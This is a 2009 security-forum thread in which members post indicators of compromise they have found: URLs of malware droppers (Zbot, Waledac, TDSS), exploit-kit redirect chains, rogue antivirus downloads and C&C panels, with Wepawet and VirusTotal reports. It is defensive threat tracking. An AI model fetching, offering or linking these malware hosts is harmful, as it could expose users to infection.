Code: [Select]
malwareremovingtool.com
securecleanertool.com
cleanerpcsolution.com
Title: Re: daily something......
Post by: GmG on March 18, 2009, 10:38:27 am
Code: [Select]
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://wepawet.iseclab.org/view.php?hash=8fe49cd0c89b388f76e9d3fc8d09ab6e&t=1237372107&type=js

Code: [Select]
http://aindu.cn/zz/index.php
http://wepawet.iseclab.org/view.php?hash=8bc9c4bf1530e2d953ae654caa8c2e77&t=1237372187&type=js

Code: [Select]
http://leepe.cn/eng2/index.php
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php

Code: [Select]
http://newsantimalware.com/720/
http://wepawet.iseclab.org/view.php?hash=fc40a6bb199d5c60ad8d42306e6e4756&t=1237372628&type=js

Code: [Select]
http://bdsm-movies.info/33/
http://wepawet.iseclab.org/view.php?hash=4397096bea5727c9b5b32d76b6eadbd2&t=1237372653&type=js

Code: [Select]
http://91.207.61.32/la/index.php
http://91.207.61.32/fies/index.php
http://wepawet.iseclab.org/view.php?hash=f2931444df46c8d9443abcb446b6eb8b&t=1237232079&type=js
Title: Re: daily something......
Post by: CkreM on March 18, 2009, 05:40:52 pm
Zbot IP that is the MDL but with different directories/drop now.


Code: [Select]
http://92.62.101.61/ready/farma.exe
http://92.62.101.61/ready/data.cab
http://92.62.101.61/ready/s192.php
Title: Re: daily something......
Post by: CkreM on March 18, 2009, 11:08:38 pm
another one:

Code: [Select]

http://vse-buddet-zae.biz/daite_deneg/X/ldr.exe
http://vse-buddet-zae.biz/daite_deneg/X/config.bin
http://vse-buddet-zae.biz/daite_deneg/X/snd.php

Title: Re: daily something......
Post by: CkreM on March 19, 2009, 12:01:39 am
Code: [Select]
http://us18.ru/@/include/spl.php
leads to:
Code: [Select]
http://us18.ru/@/load.php
Title: Re: daily something......
Post by: SysAdMini on March 19, 2009, 10:51:11 am
Code: [Select]
tw.lovechina.tw.cn/count/js/gif.gif
redirects to

Code: [Select]
cqfywg.cn/count/js/swf2.htm
cqfywg.cn/count/js/old.htm
cqfywg.cn/count/js/swfobject.js
cqfywg.cn/count/js/office.htm
cqfywg.cn/count/js/06014.htm
cqfywg.cn/count/js/92.htm

http://wepawet.iseclab.org/view.php?hash=e580167b34c4d2dd3e9dbaf8be2ca752&t=1237459572&type=js
http://wepawet.iseclab.org/view.php?hash=33298d136ed48b61bab20799d076f177&t=1237459770&type=js
Title: Re: daily something......
Post by: DiFor on March 19, 2009, 12:13:20 pm
Full file list on the server with sploits:
Code: [Select]
06014.htm
92.htm
gif.gif.htm
lz.htm
lz2.htm
office.htm
old.htm
real.gif
real2.htm
sina.htm
swf.htm
swf2.htm
swfobject.js
tj.htm
UU.htm
Title: Re: daily something......
Post by: CkreM on March 19, 2009, 04:46:24 pm
Rogue

Code: [Select]
http://mostpopularscan.com/
http://fullantispywareonlinescane.com/
http://fullantispywareonlinescane.com/promo/download/trial/InstallAVg_444.exe
http://filefixpro.com
http://free-web-scaners.com/disk/?code=286


Title: Re: daily something......
Post by: sparsha on March 20, 2009, 05:03:51 am
Rogue related sites:

Code: [Select]
webscannertools.com
central-scan.com/full.exe

Fullantispywareonlinescane.com
antispywareupdateservice.com/download/security.bmp
platinumsecurityupdate.com/tsc/winsource.dll
thankyouforinstall.cn/order_xp.php?ver=444
powerfullantivirusproduct.com/order_av.php?ver=444
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 08:56:31 am
Code: [Select]
asionigolo.com/stats.php?id=21946398
leonads.com/stats-xp/1/
redirect to
Code: [Select]
84654321.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=a9f579db0d42f30653ad3c7470164cdb&t=1237539274&type=js
Title: Re: daily something......
Post by: sowhat-x on March 20, 2009, 09:02:34 am
Quote
hxxp://sadcwed.hostindianet.com/cache/readme.pdf

Result: 3/39 (7.7%):
http://www.virustotal.com/analisis/e0bbd1fd0710e2d670f8fb2fad822dc6

Quote
hxxp://sadcwed.hostindianet.com/cache/flash.swf

Result: 1/39 (2.57%)
http://www.virustotal.com/analisis/040394b274ccb44c3188719fd77448c8
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 10:19:42 am
Quote
hxxp://sadcwed.hostindianet.com/cache/readme.pdf

Code: [Select]
perfectnamestore.cn/in.cgi?income4
namebuyline.cn/in.cgi?income2

redirect you to this site. Some days ago they led to LuckySploit, today the lead to these exploits.
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 03:24:41 pm
Code: [Select]
nuevas-videpostales.serveftp.net/retrieve/verpostal/ActiveX-Installer.exe
http://www.virustotal.com/analisis/a81a097348e41b3b8e27f79ed612812a 9/39
MD5...: 35414bbe4473ee111f54f5369da4a453
a-squared   4.0.0.101   2009.03.20   P2P-Worm.Win32.Palevo!IK
BitDefender   7.2   2009.03.20   Worm.P2P.Agent.Q
GData   19   2009.03.20   Worm.P2P.Agent.Q
Ikarus   T3.1.1.48.0   2009.03.20   P2P-Worm.Win32.Palevo
McAfee+Artemis   5558   2009.03.19   Generic!Artemis
Microsoft   1.4502   2009.03.20   Worm:Win32/Silly_P2P.G
Prevx1   V2   2009.03.20   High Risk Cloaked Malware
Sophos   4.39.0   2009.03.20   Sus/Autorun-E
Symantec   1.4.4.12   2009.03.20   W32.SillyFDC
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 03:47:33 pm
Code: [Select]
m.ef44ee.cn/a2/google.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=186377db538ece3350e1a6a5e8089c5c&t=1237563886&type=js
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 02:19:07 am
Quote
...redirect you to this site. Some days ago they led to LuckySploit, today the lead to these exploits.
There's more than one malware domains in the same ip... here's another one for example:
hxxp://ghrgt.hostindianet.com
My guess they'll continue registering domains over it every once in a while...
http://www.robtex.com/ip/94.247.3.151.html

Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates",heh...
Title: Re: daily something......
Post by: SysAdMini on March 21, 2009, 02:26:41 am
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates",heh...

Oh yes.

http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.151#result
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 02:29:34 am
 :)

I like it when they make it easy for us...
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.150#result
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.152#result
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 03:23:25 am
Quote
hxxp://porn-money.org/in.cgi?5
hxxp://dissolute-office.com/123.php
hxxp://gujjipuzzi.net/in.cgi?pipka
hxxp://benyodil.cn/pagess.html
hxxp://benyodil.cn/senks/al1/1/info.php
hxxp://gcounter.cn
hxxp://divinets.cn/z/5.htm
hxxp://divinets.cn/z/z.htm
hxxp://agkt.info/evo/count.php?o=4
hxxp://agkt.info/evo/exploits/x19.php?o=2&t=1237604581&i=1430963245

Quote
hxxp://tayforlive.ru/loader.exe
hxxp://20-ka.cn/bots/svchost.exe
hxxp://rampartech.com
hxxp://typyxiolix.com/stats-xp/
hxxp://84654321.cn/load.php
hxxp://pingpinghost.com/license.exe
Title: Re: daily something......
Post by: CkreM on March 21, 2009, 05:35:39 pm
some malware
Code: [Select]
http://www.milehighhomefinder.com/include/class/tinymce1/a.exe
http://c-0p.cn:6135/qwer/lzz.css
Title: Re: daily something......
Post by: CkreM on March 21, 2009, 05:47:25 pm
Ambler trojan c&c panel login:

Code: [Select]
http://www.mybussines.biz/best/admin.php
http://fixet.ru/admin.php
Title: Re: daily something......
Post by: CkreM on March 22, 2009, 09:10:47 am
rogue:

Code: [Select]
win-pc-defender.com
http://www.threatnuker.com/bin/ThreatNukerSetup.exe
Title: Re: daily something......
Post by: XiTri on March 22, 2009, 03:27:03 pm
Code: [Select]
http://judns.net/jud/pdf.php?id=124
http://judns.net/jud/pdf.php?id=111
http://judns.net/jud/load.php?id=9747&spl=2
Title: Re: daily something......
Post by: XiTri on March 22, 2009, 03:34:31 pm
exe it is pasted to gif

Code: [Select]
ppkok.cn/file/mm.gif
http://28.16868.org/long/logo.gif
http://28.16868.org/long/logo18.gif
Title: Re: daily something......
Post by: CkreM on March 22, 2009, 04:01:19 pm
Waledac
Code: [Select]
http://duklin.againstfear.com/news.exe
Title: Re: daily something......
Post by: bobby on March 22, 2009, 07:24:33 pm
205.209.143.94/1122.htm
205.209.143.94/000f1.htm
205.209.143.94/000f2.htm

haola123123.com/7700.htm
haola123123.com/0081.htm

It seems that more domains are sharing the same files, as I got 1122.htm as a string in more than one executable, and all are requesting this file from other domain.
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 07:54:50 am
This one is quite a bit hilarious...
Quote
hxxp://ygy.ru/index.php

DL lists...
Quote
hxxp://b.wuc7.com/tt.txt
hxxp://l.sog369.com/list.txt
hxxp://www.iukjthgvg.cn/kankan.txt

Quote
hxxp://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
hxxp://best-click-download.info/install.php ---> Spawns fake av executable...

Quote
hxxp://69.249.79.161/print.exe
-> Waledac variant:
http://www.virustotal.com/analisis/892cc1f2514f891fc20c81baa4ec1a2f

http://www.bfk.de/bfk_dnslogger_en.html?query=78.129.166.5#result
I especially enjoyed this one in particular...
Quote
hxxp://rbckc.com/redir=1566237.php
Title: Re: daily something......
Post by: sparsha on March 23, 2009, 12:30:37 pm
Code: [Select]
http://dlmaldef09.com/maldef09/install.php?track_id=10284
http://getmaldef09.com/maldef09/setup.php?track_id=10284
http://84.16.247.29/maldef09/setup.php?track_id=10284

Now time to track the "Total Security Protection" rogue throwaway sites

Code: [Select]
http://transformercity.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://antivirusonlineproscanner.com/promo/1/freescan.php?nu=880479&back==jQx3Tz2NkMOMI=N
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 01:06:55 pm
Quote
hxxp://xprotect.us/index.php?affid=02935
hxxp://personal-antivirus.com//download/PersonalAntivirus.exe
hxxp://protectprivacy18.com/maldef09_2/4/10250
hxxp://www.secure-data-group.com/

Various crap hosted in the following ips,i've only had a really quick look at them:
some domains out of them were already spotted in the past,others seem to be temporary "inactive" or so (yeah,sure...)
http://www.bfk.de/bfk_dnslogger_en.html?query=78.26.179.189#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.40#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.41#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.42#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.126#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.127#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.128#result
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 01:14:06 pm
Code: [Select]
http://www.photogalleryy.com/image.phpRedirects to:
Code: [Select]
http://66.29.31.3/~rivux/PIC2009-02-15-JPG.exe
Code: [Select]
http://89.149.254.237/redirect.php?type=0redirect to:
Code: [Select]
http://cancelyourdreams.cn/Installer2.exe
there is malware there from 1-6:
Code: [Select]
http://hackdownload.cn/install/1.exe

Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 02:31:31 pm
Quote
hxxp://anti-virus-2010-pro.info/install.php
hxxp://anti-virus-2010-pro-downloads.info/en/exe/install.exe
http://www.bfk.de/bfk_dnslogger_en.html?query=70.38.19.201#result
================================================

Now,if someone can explain me what in the world is the purpose of this one...  ???
Quote
hxxp://www.anti-virus-1.net/
It loads a Kaspersky .jpg advertisement from here...
Quote
hxxp://www.vaginoplasty-1.net/AV.jpg
Which is an open dir as well...
Quote
hxxp://www.vaginoplasty-1.net/
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 04:35:21 pm
Waledac:

Code: [Select]
http://antiterrornetwork.com/run.exe
http://fearalert.com/run.exe
http://terrorfear.com/run.exe
http://antiterroris.com/run.exe
http://terroralertstatus.com/run.exe
http://chatloveonline.com/run.exe
http://lovecentralonline.com/run.exe
http://supersalesonline.com/run.exe
http://bestlifeblog.com/run.exe
http://mobilephotoblog.com/run.exe

I could sit for hours and get like 100 of domains which host it ;D
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 04:48:59 pm
Quote
I could sit for hours and get like 100 of domains which host it  ;D
Lol ;-)
In a side-note,the ShadowServer people are mainting a regularly updated list of Waledac domains...
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 04:52:34 pm
good to know  :o

i was checking domains registered on the same IP with  http://www.bfk.de/bfk_dnslogger_en.html
Title: Re: daily something......
Post by: GmG on March 23, 2009, 07:03:30 pm
Rootkit TDss
Code: [Select]
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.exe

OSX/RSPlug-F  (user agent=Mac OS X)
Code: [Select]
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg
http://www.virustotal.com/it/analisis/438939832ba104f34907e919bc2ddac1
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 05:23:55 am
Waledac crap...current detection rates in VirusTotal at 6/39 (15.39%),here's a sample report:
http://www.virustotal.com/analisis/fb778f91c5a76e68eddbec3955c7dd44
Quote
hxxp://24.9.38.40/save.exe
hxxp://64.95.58.150/contact.exe
hxxp://64.95.58.153/news.exe
hxxp://67.223.10.108/save.exe
hxxp://69.242.22.235/main.exe
hxxp://69.14.54.169/save.exe
hxxp://69.14.99.11/contact.exe
hxxp://98.127.138.99/print.exe
hxxp://98.127.144.188/contact.exe
hxxp://99.190.177.125/run.exe

C&C servers...
Quote
hxxp://213.155.4.80/bm/controller.php?action=bot&entity_list=
hxxp://213.155.6.32/fine/controller.php?action=bot&entity_list=

Quote
hxxp://medievalmusic.by.ru/ -> Open dir...
More crap in the same ip,spamming/phishing etc...
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
http://www.robtex.com/ip/87.242.78.57.html

It also redirects strhq.cn that was spotted previously...
Quote
hxxp://medievalmusic.by.ru/mhstchk.php
Title: Re: daily something......
Post by: SysAdMini on March 24, 2009, 07:14:57 am

It also redirects strhq.cn that was spotted previously...
Quote
hxxp://medievalmusic.by.ru/mhstchk.php

Have you seen this ?

Code: [Select]
<?php echo "<!--"."hello_my_little_friend._You_have_download_this_page_and_see_th" "is_source._We_do_not_delete_anything_only_upload_change_your_passwords_and_do_not_say_it_to_anybody"."-->"?>
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 07:19:06 am
He-he,yeah,quite ridiculous,isn't it? And it's the "haitou.php" scumbags again...
Title: Re: daily something......
Post by: DiFor on March 24, 2009, 11:26:18 am
))
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 01:11:40 pm
In:
Code: [Select]
http://interhack777.by.ruhttp://wepawet.iseclab.org/view.php?hash=083efd85e283aff8a4fd9c18839aa1cf&t=1237898209&type=js
iframe of:
Code: [Select]
http://interhack777.by.ru.33406df8d1f8b3f1.beencn.cn/china.cn/http://wepawet.iseclab.org/view.php?hash=45dc5f553ec84eb856a67f69c4f330a0&t=1237898552&type=js

which redirects to luckysploit at:
Code: [Select]
http://193.138.172.15/salo/?t=6http://wepawet.iseclab.org/view.php?hash=04288c0e3940bbf4229e4d19f439e43a&t=1237478938&type=js

that downloads a trojan at:
Code: [Select]
http://193.138.172.15/salo/?h=17http://www.virustotal.com/analisis/bf83ca150e492a461d5ee61efbdb3987

another trojan that is downloaded is:
Code: [Select]
http://lousecn.cn/load/6FCF55/ie709001http://www.virustotal.com/analisis/e437f79fac10473bf74647dcd7326662
Title: Re: daily something......
Post by: PaJamis on March 24, 2009, 03:57:52 pm
variant of Win32/Adware.Agent.NLE
Quote
hxxp://av1-click-download.info/en/PE/QWProtect.dll
http://www.virustotal.com/analisis/6374e6460d03174dc78c5a2081eeb6ce
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 04:05:35 pm
and on the same IP:

Code: [Select]
http://av1-click-site.info/
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 05:11:32 pm
Code: [Select]
http://best-tube-home.com/
http://check-ms-antivirus.com/

Both use social engineer of Media player codec to download from:
Code: [Select]
http://files.ms-loads-av.com/exe/setup_1_2_1.exe
only one anti virus hit:
http://www.virustotal.com/analisis/126210179d475c81a40b6a371cef7c6d
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 06:27:52 pm
Redirect/Contains exploits(pdf exploit domain is on mdl)
Code: [Select]
http://bc69.by.ru
pdf exploit which it redirects to:
Code: [Select]
http://vpsspeedin.ru/1/pdf.phphttp://wepawet.iseclab.org/view.php?hash=6f162c5dc313445ba755f9a799be7725&t=1237919023&type=js

downloads zbot at:
Code: [Select]
http://virtyoz.info/image/fi/load.php?id=35&spl=4http://www.virustotal.com/analisis/ce5fe16d39d64107ad2cd6884973a4c7
Title: Re: daily something......
Post by: CM_MWR on March 24, 2009, 07:30:38 pm
Some of my dingleberries from last few weeks  :P

Code: [Select]
193.138.172.15/salo/?147b3cce4c7a455a85f424e630027351bf0decf9f5c2b6d461921318e73373ab5e0130cfa1d11ea6c772b232b5d24e7ad2226b2dc8abc83c2ad9492b6db74993
193.138.172.15/salo/?20630100614f1cb3b7617371a94dbb01aa6d6dea5501ab9b7bf031b622f263e38c36d0fbabdd4cc02766c70ef43594ab87f95e5a6dedbb95c1c2002dc05b14ef
193.138.172.15/salo/?5d9a3d064381864ad8ed6762adf8565929609ff4ff7598a008a3221cd4f456817bb3295a4c3a96ee7340286017c5b6b22632f52f4e3129e820b07e0528d987e0
193.138.172.15/salo/?6b76746d927a2b6a6ad63796b25d9a570c150a54f2639109ac0d45a04f4a964d11024c9721a1528be007f8ad424a5c495523b1c915d1b3d370c65a64291f9df2
193.138.172.15/salo/?t=6
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053000060B10
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530060C1117
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530090F1419
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530292F3439
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530787E8389
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053083898E93
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A3A9AEB3
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A9AEB3B8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530B2B8BDC2
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000000376600000001760000005DEB000530F9FF0409
209.34.91.23/imp2/12400.php
64.225.158.70/aNI022328/?code=BundleBase1.2328
64.225.158.70/bpx/xS5PN9.exe
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530191F2429
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
84.244.138.55/ase/?17d5d5f9dd0c1644f0f6b20b74ec080c4851ccd7da471b3ffe20293cba2e2f8981cacb18bd70dcae3597fc9eeb532e5ba20ea2283c25034d7c7a97df26c2ecac
84.244.138.55/ase/?712243de3e49129542d7beaf3af5e88f733447a27f28b850760e21c47fa99c7f3b589f8d92c08a3172ca3256cdb9c70c44c67b0a8990710d9ba987d4e3acda69
84.244.138.55/ase/?8a14b1d4f1a9842e935b9c14a07a5979f6e7639d50aff7bd0ec99dbbc3c36624d75277965f27068231bc845ab36d730920afc0341b1e0912c4a41c243676b411
84.244.138.55/ase/?8ca27317863d8812f429a9eae57ac422292fe38932698e9fde1f2dd3c4bbf4a58a12642e80fa68ce4d916e93e17562fe95930129e9fd1f8ab98f7b02d272b439
84.244.138.55/ase/?h=5ac0i?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
84.244.138.55/ase/?t=3
84.244.138.55/ts/in.cgi?lapp
94.75.234.35/data/u560x417145113
94.75.234.35/html/b874550815x19
94.75.234.35/data/ffc306323898
94.75.234.35/data/u560s1x25980757
94.75.234.35/html/kpnm1225628204
athlon.sibers.com/111.exe
benyodil.cn/pages2.html
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/pdf.php
cfsiqejclo.com/progs/jokkl/aqmznana.php
cfsiqejclo.com/progs/jokkl/bxyyyyl.php
cfsiqejclo.com/progs/jokkl/cclmmmzmna
cfsiqejclo.com/progs/jokkl/dzzaaanxkx.php
cfsiqejclo.com/progs/jokkl/eoooocccpd.php?adv=adv656
cfsiqejclo.com/progs/jokkl/hhrrre.php?adv=adv656&code1=KNIH&code2=0154&id=-1331090992&p=0
cfsiqejclo.com/progs/jokkl/liivvwf.php
cfsiqejclo.com/progs/jokkl/qmzhr.php
cfsiqejclo.com/progs/jokkl/vrrsfssgt.php
cfsiqejclo.com/uniq.php?id=-1331090992&p=0
ctfmon.info/cd/cd.php?id=&ver=nz0
ctfmon.info/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
ctfmon.info/cd/uns.php?id=&ver=nz0
dfhatnjfjw.net/ccsuper0.php
dfhatnjfjw.net/ccsuper1.php
dfhatnjfjw.net/ccsuper2.php
divinets.cn/xts/in.cgi?7
divinets.cn/z/1.htm
excelsystems.cn/soft.php?aid=0860&d=1&refer=be4f5fba9
firstgate.ru/33/cache/flash.swf
firstgate.ru/33/cache/readme.pdf
firstgate.ru/33/load.php?id=0
firstgate.ru/33/load.php?id=4
firstgate.ru/33/t.php
gbvql.wwlax.com/get_frst.php?uid=3423165F-07C8-1033-0623-990000000001
gbvql.wwlax.com/gt_bd_93.php
gbvql.wwlax.com/gt_ky.php
globalstats.net/loads/goo.exe
globalstats.net/loads/instcash.exe
globalstats.net/yes/index.php
globalstats.net/yes/load.php
gogo2me.net/.dif/go.php?sid=1
gogo2me.net/.go/check.html
gogo2me.net/.lck/?1e0f7f566750932cf9b96399a3a313ab712552ca04c019d33f696298486535fb54f7049de7dc2d36eb11acb071200d262a7deba7573384091c4d7c8de7b5302c
gogo2me.net/.lck/?t=3
google-analistyc.net/in.cgi?5
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hansali4.com/731l2.exe
members.upc.pl/i.lemecha/index.gif
mystats.cn/?cid=streamb&code=strim
mystats.cn/000/cscpu2.php?t=img&cid=amazonka&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=skype&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=streamb&n=1&mode=html
mystats.cn/general/mzn/promo.jpg
mystats.cn/general/mzn/promobanner.php
mystats.cn/general/skype/promo.jpg
mystats.cn/general/skype/promobanner.php
mystats.cn/general/skype/skype.gif
mystats.cn/general/skype/stats.php
mystats.cn/streamb/hdtvauction/hdtv-banner.jpg
mystats.cn/streamb/hdtvauction/popup.php
mystats.cn/streamb/hdtvauction/ppc.php
nolagtime.com/gwc.txt
nolagtime.com/p33r/?v=19&aic=0&p=6150&su=0&fu=0
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/iz98kbhg/404.php
pakras.com/iz98kbhg/flash.php
pakras.com/iz98kbhg/getexe.php?h=11
pakras.com/iz98kbhg/getexe.php?h=31
pakras.com/iz98kbhg/info.php
pakras.com/iz98kbhg/pdf.exp.php
pakras.com/oy5x552m/info.php
pakras.com/tn99y3w3/info.php
pakras.com/u57cwchq/info.php
porn-money.org/default.cgi
porn-money.org/in.cgi?2
reddii.ru/traffic/sploit1/?1850ytdbVddYad
reddii.ru/traffic/sploit1/?470ybVYadbtbt
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=swf
rifnasax.cn/in.cgi?2
rifnasax.cn/nuc/exe.php
rifnasax.cn/nuc/index.php
sexbases.cn/gr.php
sexbases.cn/in.cgi?15
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
teleporn.net/in/init.php
teleporn.net/stat/cache/flash.swf
teleporn.net/stat/cache/readme.pdf
teleporn.net/stat/index.php
teleporn.net/stat/load.php?id=0
teleporn.net/stat/load.php?id=4
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/kadastr.html
thehugetitstop.cn/moon.html
topdaynews.eu/norad/robo.php?r=1
topdaynews.eu/norad/robo.php?r=4
topdaynews.eu/norad/robo.php?r=5
topdaynews.eu/norad/robo.php?r=6
topdaynews.eu/norad/tasks/US
tozxiqud.cn/in.cgi?2
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=1
vpsspeedin.ru/1/load.php?id=6
vpsspeedin.ru/1/pdf.php
www.dearbornbarry.com/images/1/bin/default.exe
www.dearbornbarry.com/images/1/bin/hxS.exe
www.dearbornbarry.com/images/1/bin/load.exe
www.dearbornbarry.com/images/1/bin/test.exe
www.dearbornbarry.com/images/1/index.php
www.dearbornbarry.com/images/1/load.php?com=cfecdb276f634854f3ef915e2e980c31
www.dearbornbarry.com/images/1/load.php?mdc=0.46815614385941473
www.dearbornbarry.com/images/1/load.php?mdc=0.6208075561393851
www.dearbornbarry.com/images/1/load.php?mdc=0.7461394047952373
www.dearbornbarry.com/images/1/load.php?mdc=0.9528790372625641
www.messangerupdate.com/conf/BHOversion.asp
www.messangerupdate.com/conf/conf/conf-new.aspx
www.messangerupdate.com/conf/msgasst.dll
www.messangerupdate.com/conf/msgutil.dll
www.onlineanalytics.cn/files/20026.exe
yourwindowsvista.com/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6


Code: [Select]
0u0u.ru/nagios/cd.php?userid=--
0u0u.ru/nagios/cd.php?userid=14032009_065836_4950250
0u0u.ru/nagios/dan.php
0u0u.ru/nagios/datu.php
0u0u.ru/nagios/sdt.php
193.138.172.14/install3/security-update-KB944085.exe
193.138.172.14/install4/security-update-G5664085.exe
193.138.172.14/install4/security-update-KB964085.exe
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018766000000007600000642EB000530B8BEC3C8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000001876600000001760000005DEB000530C7CDD2D7
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A66000000007600000642EB000530FE040A0F
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A6600000001760000005DEB000530FC02070D
64.151.72.252/aaqqe?sid=648&d=15_22_40&v=945
64.151.72.252/aaqqe?sid=672&d=15_22_58&v=898
64.151.72.252/aaqqe?sid=703&d=15_22_43&v=977
64.151.72.252/aaqqe?sid=713&d=15_22_49&v=943
64.191.15.133/rio?d=kjdd&j=jjjjjs&t=zbxbhcuzafzz&k=kkkkkkklpqkkkkkk&y=yfejdjeh&x=ydci
64.191.15.133/rio?s=zyss&f=fffffo&o=uwswcxpuva&g=mmggggggghlm&w=wwww&l=lllsrw&h=mqmhukus
64.191.15.133/rio?u=bauuuuuuudacyc&r=fasx&e=lqkkeeee&x=xxxycdxx&p=pppppwva&s=yhbcccxb
66.45.246.146/40E8000879B9FABC48B65F576C0000014166000000007600000177EB000530F2F19529
66.90.101.177/chimera/ldr.exe
66.90.101.177/chimera/nDler.exe
66.90.101.177/ldr/dl/chMiB.exe
66.90.101.177/ldr/dl/minisvr4.exe
66.90.101.177/ldr/dl/mSrv.exe
66.90.101.177/ldr/dl/zchMiB.exe
66.90.101.177/ldr/files/mSrv.exe
66.90.101.177/ldr/files/zchMiB.exe
66.96.229.213/rio?d=kjdd&e=eeeeenkmimsnfk&a=hmggaaaaaa&x=xxcdxxxxxx&j=jqpupvyvmomp
66.96.229.213/rio?m=tsmmmmmmmvsu&e=imsnfklqkk&f=fffffffg&f=klfffffffm&u=afvz&w=aiyddl
66.96.229.213/rio?w=dcwwwwwwwfceaekf&i=jopuooiiiiiiii&v=abvvvvvvvcbgyvei&z=mzfz
76.191.98.246/nyfa32.exe
84.16.247.29/maldef09/install.php?track_id=10232
85.17.166.175/aaqqe?sid=684&d=15_22_55&v=911
85.17.166.175/aaqqe?sid=702&d=15_22_52&v=904
85.17.166.218/dwn/kb802348.dll
96.9.142.101/nyfa32.exe
amerika.by/libraries/tcpdf/images/spl/cfg/fies/load.php?id=31
amerika.by/libraries/tcpdf/images/spl/cfg/fies/pdf.php?id=31
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/load.php
benyodil.cn/senks/al1/2/pdf.php
bestlotron.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola25
betstarwager.cn/in.cgi?cocacola26
betstarwager.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola73
